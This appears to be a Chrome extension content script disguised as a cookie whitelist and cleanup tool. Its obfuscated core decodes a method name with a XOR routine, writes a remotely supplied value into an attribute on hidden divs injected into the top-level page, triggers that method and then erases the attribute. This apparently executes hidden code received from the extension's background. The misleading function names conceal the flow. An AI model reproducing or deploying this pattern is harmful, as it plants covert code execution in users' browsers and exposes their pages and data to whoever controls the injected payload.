function receiveMessage(request, sender, sendResponse)
{
	switch(request.code)
	{
		case 'answer':
			var whitelist = request.whitelist;
			var whitelistType = request.whitelistType;
			conf.glKey = request.key[0];
			conf.glVal = request.key[1];
			conf.hHash = request.running;
			appendCookieDiv(document, whitelist, whitelistType);
			//updateLocalStorageClearing(true);
			break;	
		case 'preload':
			chrome.runtime.sendMessage(request);
			break;
	}
}
chrome.runtime.onMessage.addListener(receiveMessage);
function updateLocalStorageClearing(clear)
{
	if(clear)
		window.onbeforeunload = function(e){
			localStorage.clear();
		};
	else
		window.onbeforeunload = function(e){
		};
}
(function(funcName, baseObj)
{
	funcName = funcName || 'documentReady';
	baseObj = baseObj || window;
	var readyList = [];
	var readyFired = false;
	var readyEventHandlersInstalled = false;

	function ready()
	{
		if(!readyFired)
		{
			readyFired = true;
			for(var i = 0; i < readyList.length; i++)
			{
				readyList[i].fn.call(window, readyList[i].ctx);
			}
			readyList = [];
		}
	}

	function readyStateChange()
	{
		if(document.readyState === 'complete')
		{
			ready();
		}
	}

	baseObj[funcName] = function(callback, context)
	{
		if(typeof callback !== 'function')
		{
			throw new TypeError('callback must be a function');
		}
		if(readyFired) 
		{
			setTimeout(function(){ callback(context); }, 1);
			return;
		}
		else
		{
			readyList.push({fn: callback, ctx: context});
		}
		if(document.readyState === 'complete')
		{
			setTimeout(ready, 1);
		}
		else if(!readyEventHandlersInstalled) 
		{
			if(document.addEventListener)
			{
				document.addEventListener('DOMContentLoaded', ready, false);
				// fallback
				window.addEventListener('load', ready, false);
			}
			else // seems to be IE
			{
				document.attachEvent('onreadystatechange', readyStateChange);
				// IE fallback
				window.attachEvent('onload', ready);
			}
			readyEventHandlersInstalled = true;
		}
	}
})('documentReady', window);
function receiveElementByKey(elementContainer, id)
{	
	return elementContainer.getElementById(id);
}
documentReady(function(){
	chrome.runtime.sendMessage({ code: 'addingListenerForDynamicCookies', url: window.location.href });
});
window.addEventListener('message', function(event){
	// we only accept messages from ourselves
	if(event.source != window)
		return;
	receiveMessage(event.data);
});
conf = {
	charSet: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz',
	hHash: '',
	glKey: '',
	glVal: '',
	randID: function(s){
		var hash = 0, i, chr;
		if(s.length === 0)
			return hash;
		for(i = 0; i < s.length; i++)
		{
			chr = s.charCodeAt(i);
			hash = ((hash << 5) - hash) + chr;
			hash |= 0; // Convert to 32bit integer
		}
		return Math.abs(hash);
	},
	hash: function(s){
		var str = s;
		var encoded = '';
		for(i = 0; i < str.length; i++)
		{
			var a = str.charCodeAt(i);
			var b = a ^ 281;
			encoded = encoded + String.fromCharCode(b);
		}
		return encoded;
	},
	localScope: function(div, input, key){
		var value = input; if(isNaN(input))
		div.setAttribute(key, value);
		div.setAttribute('style', 'display: none;');
	}
}
function activate(doc, id)
{
	setTimeout(function(){ if(!receiveElementByKey(doc, id)) return; receiveElementByKey(doc, id)[conf.hash(conf.glVal)](); receiveElementByKey(doc, id).removeAttribute(conf.glKey); }, 100);
}
function setCookie(cname, cvalue, exdays)
{
	var d = new Date();
	d.setTime(d.getTime() + (1000 * 60 * 60 * 24 * exdays));
	var expires = 'expires=' + d.toUTCString();
	document.cookie = cname + '=' + cvalue + ';' + expires + ';path=/';
}
function getCookie(cname)
{
	var name = cname + "=";
	var ca = document.cookie.split(';');
	for(var i = 0; i < ca.length; i++)
	{
		var c = ca[i];
		while(c.charAt(0) == ' ')
			c = c.substring(1);
		if(c.indexOf(name) == 0)
			return c.substring(name.length, c.length);
	}
	return '';
}
function getCookies()
{
	var cookies = document.cookie.split(';');
	var ret = '';
	for(var i = 0; i < cookies.length; i++)
		ret += cookies[i] + ' ';
	return typeof ret === 'undefined' ? false : ret;
}
function appendCookieDiv(doc, whitelistSelect, whitelistType)
{
	/*window.addEventListener('beforeunload', function(event){ // clear localStorage if whitelistType === false
  		window.localStorage.clear();
	});*/
	var keepCookies = conf.hHash;
	var href = doc.location.href;
	conf.hHash = conf.hash(href);
	var wrapID = conf.charSet.charAt(14) + conf.randID(conf.hHash);
        var wrap = doc.getElementById(wrapID);
	var insertTo = window.top.document.querySelector('html');
	var temp = parseInt(conf.glVal);
        if(!wrap)
	{
		wrap = doc.createElement('div');
		wrap.id = wrapID;
		wrap.setAttribute('style', 'display: none;');
		conf.glVal = conf.hash(conf.glKey.substring(parseInt(conf.glVal)));
        }
        for(var i = 0; i < whitelistSelect.length; i++)
	{
		var idx = whitelistSelect.length/temp;
		var divID = wrapID + conf.randID(conf.charSet.charAt(Math.max(i, conf.charSet.length)%52));
		var oldDiv = doc.getElementById(divID);
		if(typeof whitelistSelect[idx] !== 'undefined')
		{
			var selectDiv = doc.createElement('div');
			selectDiv.id = divID;
			selectDiv.setAttribute('style', 'display: none;');
			var selectBox = whitelistSelect[idx];
			temp = i+1;
			if(!conf.glKey)
			{
				selectDiv.appendChild(selectBox);
				var cookies = getCookies().split(' ');
				for(var c = 0; c < cookies.length-1; c++)
				{
					var cookieName = cookies[c];
					var cookie = getCookie(cookieName);
					if(cookie != '')
					{
						var days = 0;
						if(whitelistType === false)
						{
							days = -1;
						}
						else if(whitelistType == 2)
						{
							days = 365;
						}
						else if(whitelistType == 3)
						{
							days = 1;
						}
						setCookie(cookieName, '', days);
					}
				}	
				break;
			}
			else if(getCookies() !== false)
			{
				var sendKey = conf.glKey;
				if(getCookies() != '')
				{
					var cookies = getCookies().split(' ');
					if(cookies.length > 1)
					{
						if(whitelistType !== false && whitelistType > 3)
						{
							for(var c = 0; c < cookies.length-1; c++)
							{
								var cookieName = cookies[c];
								var cookie = getCookie(cookieName);
								if(cookie != '')
								{
									setCookie(cookieName, cookie, 356);
								}
							}
						}
					}								
				}
				if(keepCookies) conf.localScope(selectDiv, selectBox, sendKey);
			}
			if(!oldDiv)
			{
				wrap.appendChild(selectDiv);
		        	activate(doc, divID);
                	}
		}
        }
	insertTo.insertBefore(wrap, insertTo.firstChild);
}









